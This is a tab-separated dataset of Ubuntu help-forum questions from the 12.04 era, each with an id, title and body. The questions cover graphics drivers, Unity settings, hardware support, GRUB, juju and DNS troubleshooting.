display subsection in screen section `` default screen '' for depth/fbbpp 24/32 [ 48.956 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 48.956 ] ( == ) intel ( 0 ) : rgb weight 888 [ 48.956 ] ( == ) intel ( 0 ) : default visual is truecolor [ 48.956 ] ( ** ) intel ( 0 ) : option `` dri '' `` true '' [ 48.957 ] ( ii ) intel ( 0 ) : integrated graphics chipset : intel ( r ) 852gm/855gm [ 48.957 ] ( -- ) intel ( 0 ) : chipset : `` 852gm/855gm '' [ 48.957 ] ( ** ) intel ( 0 ) : relaxed fencing disabled [ 48.957 ] ( ** ) intel ( 0 ) : wait on swapbuffers ? enabled [ 48.957 ] ( ** ) intel ( 0 ) : triple buffering ? enabled [ 48.957 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 48.957 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 48.957 ] ( ** ) intel ( 0 ) : 3d buffers tiled [ 48.957 ] ( ** ) intel ( 0 ) : swapbuffers wait enabled nothing sticks out on first gloss . it looks like it 's detecting the proper chipset and loading the corresponding driver . my hunch is that it 's using software rendering when before at least hw acceleration was used . any thoughts ? thanks .
131216	how can i make the movement of files a real movement of files ?	in the new ubuntu , when i move files in the gui , they are copied by default . if you want to move them or make a link you need to press the alt tab . this behavior is very strange , nobody is used to it , and is prone to errors and duplication of files . how can the default be reverted to the normal thing ?
131218	can the grey options in context menu be fixed ?	i ca n't determine when , but often the context menu shows options in gray when they should n't because they are activated and you can used them . i have seen this with resize , with paste ( after copying files ) and with `` create new folder '' in a mounted partition . the partition was nt protected by permissions and a few seconds later or in another window i could do the operation . can that be fixed ? i do n't like that .
131219	kubuntu 11.10 muon not recognizing 12.04 exists !	i am in kubuntu ... went to muon-update ... performed updates system restarted now no updates available . system does not even recognize that 12.04 is out and available . no updates available for install as of 5/3/12 . how to fix ?
131220	difference between delete and delete all ?	when i want to delete files i ca n't choose in the context menu between deleting them completely or sending them to trash ( ! ) . with the key shorcuts i can delete them completely but i if select a set of files/folders i am asked whether to `` delete all '' of them or to simply `` delete '' . what is the difference ? whatever i choose it deletes all the selected . so what is the reason for the question if nobody listens . is it possible to eliminate the useless question ? .
131222	how can i reload the unity to show changes ?	when i make changes to elements in unity 's launcher and the search-layer , like the icons , the changes are not reflected immediately . how can i kill and reload all the unity or hud thing ? is it possible to do it so easily as it was to reload the gnome-panel in the good times ?
131231	12.04 - memory not fully recognized	this might look like an easy one `` get yourself different memory chips '' , but i 'm not convinced : i set up 12.04 64bit on a new board with 8 gb of memory plugged in . i can see all 8 gb in the bios ( it says : 4 x 2gb plugged in ) , even though the self memory tests ( run before i enter the bios ) shows only 3820 mb . if i launch ubuntu , system info also displays 3820mb , but if i run the memory test ( - > system testing ) , it fails with meminfo total : 3533740 kb dmi total : 8192000 kb accuracy : 43.00 memory totals not close enough ooops , there are my 8gb ! ? so , i 'm desperately looking for any leads from here ... . ps : double checked that i installed the 64bit version ...
131233	low quality image rendering in gthumb/eog	i am having problems with image quality when reducing images or zooming out in certain applications . it looks almost as if the image is not being smoothed or anti-aliased . on the left is gthumb/eog ( look the same ) - on the right is gimp . left one is clearly broken . it never used to be like that . those are at 20 % zoom : they 're identical full size . [ edit : actually they do n't but the difference is minor ; left is still worse . ] eye of gnome ( eog ) and gthumb both suffer from it when resizing to reduce , and when zooming out to reduce , but oddly gthumb does n't suffer when generating thumbnails . shotwell and gimp are unaffected . libre office is affected . given this , i wonder if anyone might know which component ( s ? ) /issues are the cause ? i 'm on a 64 bit precise with nvidia 8800 gtx ( nouveau ) . edit : additional information . if i use the tools dropdown button in the top toolbar of gthumb , it reduces images size and retains full quality . if i instead click the paint palette at the top right to enter edit mode , and resize from in there , it loses quality . the `` high quality '' check box makes a difference but not significantly . the zoom also loses quality . i am wondering if perhaps it does n't have 2 rendering modes and 1 is broken ? edit 05may2012 : i have since discovered that ( a ) the image quality for eog and gthumb suffered its regression in oneiric ( maverick , natty work fine ) . ( b ) it is not limited to ubuntu , it also affected fedora 16 . so i 'll take as an accepted answer anyone who can either fix that or advise me how to go bug reporting this . i do n't really know which packages to apply it to , or whether it needs to go to ubuntu or gnome . thanks !
131237	editing reviews fails in software center	i am on 12.04.i would like edit a review i wrote before about uck in software center but it fails when i click modify with `` error to communicate with the server '' . my internet works well.it frustrates me coz i forgot to vote that application and another user made a comment about it.please help .
131238	can you tell which are the canon laser printers that suport in ubuntu 12.04 ?	can you give which are the canon laser printers that suport in ubuntu 12.04 ? is laser shot lbp2900 support in ubuntu .
131241	which canon flatbed scanners are supported in 12.04 ?	how do i find out which canon flatbed scanners are supported in ubuntu 12.04 ? specifically i need to know if the canon lide 110 is supported ?
131245	how to install ubuntu from cd	i recently downloaded ubuntu and am having trouble installing it . i have converted the image to a cd using infrarecorder and set bios to launch from cd/dvd . whenever i start the computer i just get a flashing command prompt for about 10 seconds and the it launches windows from the hard drive . how do i get it to recognize the cd and launch from it ? my end goal is to reformat my hard drive and install ubuntu .
131246	problem with ubuntu 12.04 - dell xps 15z - keyboard , trackpad , graphic card	i 've just installed ubuntu 12.04 , and it doesnt recognize any additional drivers , the keyboards does not work nor does the trackpad nor does it recognize the graphic card . how can i solve this problems ? also sometimes it crashes during the booting . any suggestions ? thanks ,
131255	graphics coming as unknown , i have intel 4500mhd	i have acer aspire 5738g and it has intel gma 4500mhd graphics . when i check system it shows the graphics as : unknown , driver as unknown . how to install latest drivers in ubuntu for intel 4500mhd ? thanks .
131259	on really old ubuntu 6.06 - how to upgrade	i 'm on an old ubuntu version ( ubuntu 6.06.2 lts server ) which is n't really supported any more . so the automatic updates do n't work . i have ispconfig installed to manage a few web sites . what 's the best course of action ? i 'd like to upgrade to something current , but i ca n't figure out how to go about doing this , given that the apt-get scripts do n't really work any longer .
131260	how can i select a wallpaper that is not is the pictures folder ?	i do n't like to use the pre-made folders . i want to organize the things the way i want and with the names i want . moreover i do n't want to have to move a picture every time i want to try and see how it looks as a background wallpaper . so , how can i quickly select an image in any folder as a desktop background .
131263	nokia netbook wo n't boot after install	i installed ubuntu 12.04 onto my nokia 3g netbook , to replace the windows 7 starter that i had . once the install finished it prompted me to restart my computer . i did this , but rather than booting up the screen just goes black . i managed to boot up from the usb again and trying a fresh install overriding the previous one , but i have the same problem . any ideas ?
131269	how to restore the boot logo ?	this is a question i had since ubuntu 11.04 : how can i restore ubuntu 's boot logo ? i installed it in four different pcs ( one of them a vm , another of them , my actual installation on my mac ) , and i look that the same thing happends every time i install ubuntu : the live cd boots showing the logo and the dots bar , but when i boot from the hard drive , i just see a magenta dye screen . what should i do ? i 'm using ubuntu 12.04 ( imac 21'5 '' late 2009 ; virtualbox machine ) and 11.10 ( rest of pcs ) .
131270	dual monitors - extend desktop	i have ubuntu 12.04 on my laptop , and i have an external monitor connected to my system . i have enabled the second monitor from the `` displays ... '' menu ( btw , is there a way to make external monitors enabled by default ? ) and it extends as one large workspace . my typical use is : external monitor plays a movie , series , streams video etc , and i work on the laptop 's monitor . the problem is , when i click anywhere in my laptop display , the unity bar is also shown on the monitor that plays videos , which can be pretty annoying . is there any way i can make my life better - turn of unity bar and the bar on top on the monitor that is playing video on full screen ?
131288	error on boot : unknown command 'gfxmode ' . pressing any key continues	when i boot into linux , i get this : error : unknown command 'gfxmode ' . pressing any key continues it takes about 5 secs to boot after that . pretty slow compared to 11.10 , i think . anyway , my ubuntu is 12.04 and it just updated today and changed the grub with grubcustomizer . anyway , i do n't want any gfx interface or resolution on the grub customizer , but it keeps giving that error even if it is n't marked in grub customizer . i found some help here , in this question : error : unknown command 'gfxmode ' . pressing any key continues i found the line it mentions in the 00_header . but set is found in front of the gfx there , so that is n't actually the problem . this is my /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' saved '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode= '' 1024x768x24 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_savedefault= '' true ''
131291	how to mount disk.root into my new ubuntu ?	i tried sudo mount -t /media/66cc2bc0cc2b88ff/ubuntu/disks/disk.root -o ro , loop=/dev/loop0 but it did n't work . any suggestions ? ty !
131295	found a laptop that i like , but it 's not completely compatible with ubuntu . questions	here it is : http : //www.walmart.com/ip/19581017 i like the specs ( 4-core amd , 6gb ram , 2/2 usb 2.0/3.0 ports , 17 '' led screen ) , price , and look of the laptop , otherwise i would forget about it . anyways , i found this post about how this laptop is incompatible with ubuntu : http : //ubuntuforums.org/showpost.php ? p=11851198 & postcount=298 to summarize , the gpu portion of the apu ( cpu + gpu on a single die ) does n't work . the problem apparently lies in the amd drivers for that particular gpu . there is integrated graphics on the motherboard , so you can disable the on-die gpu , but i think it 's pretty safe to assume the integrated graphics is vastly inferior to the on-die radeon hd 6620g . question # 1 : how likely is it that amd plans to fix this issue ? question # 2 : how likely is it that , if a laptop works on ubuntu , it will also work on opensuse ? are drivers cross-distro ?
131296	juju could not deploy charms due to not being able to download packages	i update to the ubuntu 12.04 yesterday . and install the juju with : sudo add-apt-repository ppa : juju/pkgs sudo apt-get update & & sudo apt-get install juju and i install the lxc also.then deploy a charms , but the service does not start up . and the log show python error . 2012-05-03 03:57:20,439 : twisted @ error : i : retrieving inetutils-ping 2012-05-03 03:57:20,440 : twisted @ error : i : validating inetutils-ping 2012-05-03 03:57:20,440 : twisted @ error : e : could n't download packages : libnih1 libglib2.0-0 libpython2.7 hostname liblocale- gettext-perl libfribidi0 sysvinit-utils libapt-pkg4.11 libnih-dbus1 openssh-client findutils libmagic1 libbz2-1.0 login libm ount1 base-passwd 2012-05-03 03:57:20,440 : twisted @ error : failed to execute template 'ubuntu' 2012-05-03 03:57:20,441 : twisted @ error : aborted 2012-05-03 03:57:20,441 : twisted @ error : 2012-05-03 03:57:20,442 : juju.agents.machine @ error : error starting unit : cloudfoundry/0 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/agents/machine.py '' , line 97 , in watch_service_units yield self.unit_deployer.start_service_unit ( unit_name ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/unit/deploy.py '' , line 92 , in start_service_unit self.machine_id , self.client.servers , bundle ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/machine/unit.py '' , line 227 , in start machine_id , bundle , public_key ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/machine/unit.py '' , line 204 , in _get_container machine_id , public_key ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/machine/unit.py '' , line 192 , in _get_master_template yield master_template.create ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/lib/lxc/__init__.py '' , line 281 , in create yield defertothread ( self._create_wait ) file `` /usr/lib/python2.7/dist-packages/twisted/python/threadpool.py '' , line 207 , in _worker result = context.call ( ctx , function , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/twisted/python/context.py '' , line 118 , in callwithcontext return self.currentcontext ( ) .callwithcontext ( ctx , func , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/python/context.py '' , line 81 , in callwithcontext return func ( *args , **kw ) file `` /usr/lib/python2.7/dist-packages/juju/lib/lxc/__init__.py '' , line 274 , in _create_wait config_file=lxc_config ) file `` /usr/lib/python2.7/dist-packages/juju/lib/lxc/__init__.py '' , line 60 , in _lxc_create return _cmd ( args ) file `` /usr/lib/python2.7/dist-packages/juju/lib/lxc/__init__.py '' , line 46 , in _cmd raise lxcerror ( stdout_data ) lxcerror : debootstrap is /usr/sbin/debootstrap and another error log : 2012-05-03 03:57:20,558 : juju.agents.machine @ debug : units changed old : set ( [ 'cloudfoundry/0 ' ] ) new : set ( [ 'cloudfoundry/2 ' ] ) 2012-05-03 03:57:20,558 : juju.agents.machine @ debug : stopping service unit : cloudfoundry/0 ... 2012-05-03 03:57:20,559 : unit.deploy @ info : stopping service unit cloudfoundry/0 ... 2012-05-03 03:57:20,559 : unit.deploy @ debug : destroying container ... 2012-05-03 03:57:20,610 : twisted @ error : 'dragon-sample-cloudfoundry-0 ' does not exist 2012-05-03 03:57:20,610 : twisted @ error : 2012-05-03 03:57:20,611 : juju.agents.machine @ error : error stopping unit : cloudfoundry/0 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/agents/machine.py '' , line 90 , in watch_service_units yield self.unit_deployer.kill_service_unit ( unit_name ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/unit/deploy.py '' , line 104 , in kill_service_unit yield deployment.destroy ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/machine/unit.py '' , line 287 , in destroy yield self.container.destroy ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/lib/lxc/__init__.py '' , line 329 , in destroy yield defertothread ( _lxc_destroy , self.container_name ) file `` /usr/lib/python2.7/dist-packages/twisted/python/threadpool.py '' , line 207 , in _worker result = context.call ( ctx , function , *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/twisted/python/context.py '' , line 118 , in callwithcontext return self.currentcontext ( ) .callwithcontext ( ctx , func , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/python/context.py '' , line 81 , in callwithcontext return func ( *args , **kw ) file `` /usr/lib/python2.7/dist-packages/juju/lib/lxc/__init__.py '' , line 77 , in _lxc_destroy return _cmd ( [ `` sudo '' , `` lxc-destroy '' , `` -n '' , container_name ] ) file `` /usr/lib/python2.7/dist-packages/juju/lib/lxc/__init__.py '' , line 46 , in _cmd raise lxcerror ( stdout_data ) lxcerror : 'dragon-sample-cloudfoundry-0 ' does not exist by the way , i find many install log in the machine-agent.log , is it normal in the first time ? thanks .
131307	i have sound , but volume bar is `` inactive '' and i ca n't use volume shortcuts	i just upgraded to 12.04 i have sound . using headphones also mutes the speaks . so far so good . i ca n't use my shortcuts to control volume anymore . it 's usually fn + left arrow and fn + right arrow . in top right corner , the volume bar looks like the volume is all down . clicking on it , i can go to sound settings ... and it seems i ca n't use that application . it opens , but i ca n't click on anything and basically there is nothing to click on . it 's greyed out with no information . what do i do ? i can control volume through gnome alsamixer ... or whatever player i play music from ( so it seems . i tried rythmbox ... and youtube ) . but it still seems the sound application does n't work . i 've got a lenovo u350 .
131308	install software with 12.04	just freshly installed from 12.04 after using 11.04 and dist-upgrading to 11.10 a few months back , figured a fresh installation was due . first thing i noticed is that synaptic is no longer installed by default . i 've no issues with this , and assume the approach to install packages is now via the ubuntu software center . however , i notice there are a lot of packages missing . i was looking for `` vagrant '' , which i 've had to install manually with a sudo apt-get install , but was hoping to use gui for most things . surely there is a gui way ? i also noticed when checking for `` vim '' , it comes up with gvim and a little note at the bottom saying `` show 2 technical items '' , which when clicked shows the vim i was looking for . just curious what the expected gui way is of installing these supposed `` technical packages '' .
131309	how can i reinstall java when i ca n't find an archive for it ?	i heard about a program which allows you to make music on linux computers called linux multimedia studio . i typed sudo apt-get install lmms into the terminal but it responded : e : the package sun-java6-jre needs to be reinstalled but i ca n't find an archive for it . how can i reinstall this program ?
131311	ubuntu upgrade from 11.04 to 12.04 on mulitple pcs	i have around 10 pcs , they currently have ubuntu 11.04 running . i need to upgrade the pcs from 11.04 to 12.04 without downloading all the ubuntu packages every time . what would be the best way to upgrade them ? i do not want to loose settings and/or data on these pcs , so re-installing is not an option .
131317	how to make terminator transparent ?	i 'm using a standard installation of ubuntu 12.04 with unity and i 'd like to make terminator transparent as we can easily do for the standard terminal . is that possible ?
131318	touchpad not working on acer travelmate 4740 after applying recent updates in ubuntu 12.04	my touchpad stopped working on my acer travelmate 4740 after i 've applied updates through the update manager on precise pangolin . it is working when on the ( lightdm ) login screen , but not after logging in . i 've tried everything that was suggested in the following threads to no avail : touchpad not working occasionally in compaq presario cq45 keyboard and touch pad is not working on a dell xps 15z touchpad on ubuntu 12.04 stop working after restart any help would be much appreciated . thanks . more information : it is working when i log into lxde ( installed `` lubuntu-desktop '' ) , but not in unity .
131319	evolution mail client privacy	im using ubuntu 11.04 and default mail client as evolution , is there any privacy tabs as one found in thunderbird ? i wanted to block users while opening my evolution mail client , it will show the mails already downloaded . in thunderbird i can block by setting a master password which will ask for a master password while entering into the mail client . like wise is there anything in evolution mail client to avoid users from seeing my mails already downloaded ?
131321	gnome-shell failed to launch when dual monitor detected , nvidia card	i installed a clean precise . i like gnome-shell so i installed it . it worked well with single monitor . but it does not work well when i go to office , plug my external monitor onto my laptop . i am using nvidia driver . another colleague is using the same laptop , he can work well with dual monitors . his laptop is ati graphic card . when i plug my extended monitor cable , i choose gnome , but actually it goes to gnome 2 classic desktop environment , not gnome 3 . when i disconnect the extended monitor , restart x , i can login with gnome3 . do i have to choose between gnome3 and extended monitor ? it 's a hard choose .
131322	`gedit` assertion failure `gtk_is_tree_selection ( selection ) `	i am seeing assertion failures in gedit on a fairly fresh install of precise . this does not happen on every invocation of gedit but only if i edit > preferences . the assertion failure happens upon closing the preferences dialog . since it relies on gtk , i suppose there is a chance that this is an installation problem . how can i fix this ? ( gedit:3634 ) : gtk-critical ** : gtk_tree_selection_get_selected : assertion `gtk_is_tree_selection ( selection ) ' failed by the way , this assertion failure is seen in terminal . if you launch gedit from the ubuntu unity launcher , you will not see the failure .
131323	two `` search '' entries in resolv.conf	i am using 12.04 and have a problem with my resolv.conf there are 2 search lines there . but i can only explain one . i would like to get the other one removed . carsten @ myubuntubox : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search aaaa.bbb.example.net search something nameserver 1.2.3.4 nameserver 1.2.3.5 i ca n't explain the search aaaa.bbb.example.net where does it come from ? the last 3 lines ( like i want come from /etc/resolvconf/resolv.conf.d/tail this is good . but where is the other search line coming from ? in /etc/dhcp/dhclient i removed the requests for domain-name-servers , domain-search , but the lines are still in there . should i remove the dhcp6.domain-search as well ?
131324	acls do not work correctly on cifs windows share	permissions do not function correctly if i mount a windows 7 share using sudo mount -t cifs //host/share /mnt/share -o username= '' windows user '' , password= '' password '' , iocharset=utf8 , uid=user , nobrl , noserverino , cifsacl specifically , i can not remove the read or execute bit from a file , but i can change the write bit . all of the files have the write and execute bit set for user , group and other . the execute bit is not set in the windows permissions . i have been using this command on an opensuse install successfully . when mounted on that distro the files reflect the actual windows permissions and do not all have the execute bit set . furthermore , i am able to change the permissions using chmod . ( note , i am running the linux installs in vmware workstation 8.0.3 ) . kubuntu 12.04 64-bit : linux hostname 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux . opensuse 12.1 64-bit : linux hostname 3.1.10-1.9-desktop # 1 smp preempt thu apr 5 18:48:38 utc 2012 ( 4a97ec8 ) x86_64 x86_64 x86_64 gnu/linux
131336	how to play audio from a2dp enabled headset ? i have ubuntu 11.10 system	i am trying to play few audio files from my ubuntu 11.10 system . and do n't know which a2dp enabled blue-tooth head set would be required .
131338	bash script for counting the number of processes running returns odd answer	i was writing a script to display the number of processes running for the script i am running . the file name is test.sh the code is # ! /bin/bash echo `ps -ef | grep test.sh ` no_proc=`ps -ef | grep test.sh | wc -l` echo $ no_proc if [ $ no_proc -gt 1 ] then exit else echo `` success '' fi i am getting the following output mohi 16973 16570 0 03:16 pts/2 00:00:00 sh test.sh mohi 16974 16973 0 03:16 pts/2 00:00:00 sh test.sh 2 how is it counting the lines as two ? i am really confused : ( please explain why ( if there is any ) . thanks
131341	can i make my own commands ?	i was wondering whether i could make my own commands as in if i were to type in 'music ' at the command line , my vlc should open up and start playing my playlist . the vlc thing is just an example but the question remains . can i make my own commands ? if yes , how ?
131342	dnsmasq sometimes resolves things , sometimes it does n't	trying to resolve : nslookup testserverinlocaldns server : 127.0.0.1 address : 127.0.0.1 # 53 ** server ca n't find testserverinlocaldns : nxdomain after 10 seconds everything is ok : nslookup testserverinlocaldns server : 127.0.0.1 address : 127.0.0.1 # 53 name : testserverinlocaldns.localnet address : 192.168.3.8 and the same thing again and again . sometimes it resolves , sometimes not . when i set resolv.conf to local dns servers manually - everything is ok . but after reboot it gets back to 127.0.0.1 again .
131344	parallel use of intel and nvidia ( egpu ) driver / not hybrid !	i 'm using ubuntu 12.04 on a lenovo x220 notebook with onboard intel graphics . i purchased a so called external pcie gpu ( geforce gtx 560 ti ) which is connected via the card slot of my laptop . now i want to switch to the nvidia driver on boot when the egpu is connected . if it is not , i want to switch back to the intel driver . i 've written a little script doing the job : it places the nvidia xorg.conf on startup ( on egpu ) or removes it ( on intel ) . the problem is that the nvidia driver changes some libraries ( and maybe more ) so i ca n't use the intel driver . the following error message occurs in xorg.log : ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) my question is : does anybody know how to switch back to the intel driver without completely removing the nvidia driver ? do i have to change some symlinks or something like this ?
131351	how to install vmware tools ?	i installed my ubuntu in vmware , no i need install vmware tools , i got error : searching for a valid kernel header path ... the path `` '' is not valid . would you like to change it ? [ yes ] in centos , i run the following command to resolve this issue : yum install gcc-c++ yum install kernel-devel yum install kernel-headers yum -y update kernel but i do n't know how to do in ubuntu . please help . update i have tried the following command but nothing changed , still got error : searching for a valid kernel header path ... the path `` '' is not valid . would you like to change it ? [ yes ] sudo apt-get update sudo-get install build-essential linux-header- $ ( uname -r ) sudo ./vmware-uninstall-tools.pl sudo ./vmware-config-tools.pl sudo ./vmware-install.pl issue changed : run sudo ./vmware-uninstall-tools.pl , and delete the folder of /etc/vmware-tools then , run sudo ./vmware-install.pl now i can successfully install vmware-tool.after restart , i can see folder of /mnt/hgfs , but ca n't see my shared folder .
131357	brightness options in ubuntu 12.04 desktop missing	i am unable to change the brightness of my desktop screen using this path . system settings { top right corner of the screen ) > under personal brightness & lock.no option to change brightness is available here.in ubuntu 11.04 shift key + +/- key was used to change brightness , the same does n't work in 12.04 . also under system settings { top right corner of the screen ) > under hardware displays , my monitor is recognized as a laptop despite me using a desktop !
131358	drracket does n't work on ubuntu 12.04	when i try to use drracket on ubuntu 12.04 , i get this error : ffi-lib : could n't open `` libjpeg.so.62 '' ( libjpeg.so.62 : can not open shared object file : no such file or directory ) === context === /usr/lib/racket/collects/racket/draw/unsafe/jpeg.rkt : [ running body ] /usr/lib/racket/collects/racket/draw/private/bitmap.rkt : [ traversing imports ] /usr/lib/racket/collects/racket/draw/private/dc.rkt : [ traversing imports ] /usr/lib/racket/collects/racket/draw/private/svg-dc.rkt : [ traversing imports ] /usr/lib/racket/collects/racket/draw.rkt : [ traversing imports ] /usr/lib/racket/collects/mred/private/kernel.rkt : [ traversing imports ] /usr/lib/racket/collects/mred/private/const.rkt : [ traversing imports ] /usr/lib/racket/collects/mred/private/check.rkt : [ traversing imports ] /usr/lib/racket/collects/mred/private/mred.rkt : [ traversing imports ] /usr/lib/racket/collects/mred/mred.rkt : [ traversing imports ] /usr/lib/racket/collects/mred/main.rkt : [ traversing imports ] /usr/lib/racket/collects/racket/gui/base.rkt : [ traversing imports ] /usr/lib/racket/collects/drracket/drracket.rkt : [ traversing imports ] how can i correct this error ?
131359	how do i enable the alt + f10 , f9 shortcuts ?	helo , why there is no alt+f10 ( maximize ) or alt+f9 ( minimize ) shotcut in ubuntu 12.04 ? or can i enable them somewhere ?
131363	how do i install an older version of mercurial for tortoisehg ?	i wish to get tortisehq for use with bitbuket working in ubuntu but i can not work it out ... i have the latest version of ubuntu 12.04 at teh time of this post ... i used these commands to install.. sudo add-apt-repository ppa : mercurial-ppa/releases sudo add-apt-repository ppa : tortoisehg-ppa/releases sudo apt-get update sudo apt-get install tortoisehg sudo apt-get install qct vim emacs kdiff3 kompare meld xxdiff tkcvs mgdiff i am sure this is how i did it last time only a few weeks ago ( setting up a mates laptop now ) but when i try to run tortisehq workstation i get this error ... ** mercurial version ( 2.2.1 ) . tortoisehg version ( 2.3 ) ** command : log ** cwd : /home/itisme ** encoding : utf-8 ** extensions loaded : ** python version : 2.7.3 ( default , apr 20 2012 , 22:39:59 ) [ gcc 4.6.3 ] ** qt-4.8.1 pyqt-4.9.1 this version of tortoisehg requires mercurial version 2.0.n to 2.1.n , but found 2.2.1 so i guess i need to install an older version of mercurial.. but i do not know how.. also the context menus in the ui file browser are not showing up ... any ideas ?
131366	if i install any dekstop environment ( like xfce ) alongside unity can it affect unity ?	i want to be sure whether it going to break something like my default unity desktop or not . i once tried kde on ubuntu and it broke the whole theme . i had to reinstall ubuntu that time . i dont want that to happen again . i have found this which explains how i can install xfce or other des available for ubuntu 11.10 .
131368	is there any way to dual boot windows 7 and lubuntu ?	just wandering if there is any way to dual boot my windows 7 os with lubuntu , as i have a netbook , and do n't want to loose windows , but want a faster os . thanks in advance , will
131374	update g++ through synaptic package manager	currently g++ 4.4.3 is installed on my ubuntu , but i want to update it to 4.6.3 version . when i search `` g++ '' in synaptic package manager there is nothing about newer versions . how can i update my g++ then ?
131375	is there any difference between kde and kubuntu installation on ubuntu ?	is there any difference between kde and kubuntu ?
131377	alps touchpad not working on vaio vpceh laptop	i have installed ubuntu 12.04 on a sony vaio ( edit : known from the tags ) . although the touchpad is recognized , i am unable to lock the touchpad .
131380	disable notifications about new spam emails with indicator app / thunderbird	i 'm using thunderbird and the indicator applet complete under 12.04 with the classic gnome desktop . the mail indicator icon notifies me correctly about new email ( at least when i have thunderbird open , which is fine ) . however it also notifies me about new emails in my spam folder , which is annoying and makes the indicator much less useful because i get a lot of false-positives . is there a way to exclude certain folders like the 'spam ' folder ? note that this is a little similar like any way to exclude accounts from mail indicator ? , but i 'm talking about excluding folders not accounts , so it is not a duplicate .
131385	sound doesnt work in newest kernel , but works in 2.6.33 kernel ?	when i install the 10.04 lts lucid lynx kernel on my ubuntu 12.04 lts system , sound works fine . but if i use newest kernel of 12.04 , it shows my audio hardware but plays no sound . i do n't want use the old kernel , because i think i can not use some software , including gnome 3 , with it . or at least they did n't work when i tested the old kernel , and the screen resolution was low . i also tried newer kernels but only 2.6.33 worked without any sound problems . my sound card is a realtek hd ati alc1200 integrated card . my front jack is broken and it detects that something is always plugged in -- does this affect my situation ? do i have to buy a new sound card ? that would suck .
131390	image viewer - automatically fill window with image	when i maximise an image viewer window , the picture stays the same size . in the view options none of them seem to make the image just fill the window . i can zoom in but that is quite irritating as i have to compare several pictures in a folder and it forgets that i zoomed in when i return to a picture . is there anyway to change the default behaviour ? or perhaps there is a different program i should be using ? note : this is for my work computer which will be sticking with 11.10 for at least another month , but any 12.04 specific advice would also be much appreciated .
131391	how to add application to application list ?	i installed sublime text 2 from source . how can i open text files with sublime ? how can add sublime text to application list ? how can i set up subime the default text editor ?
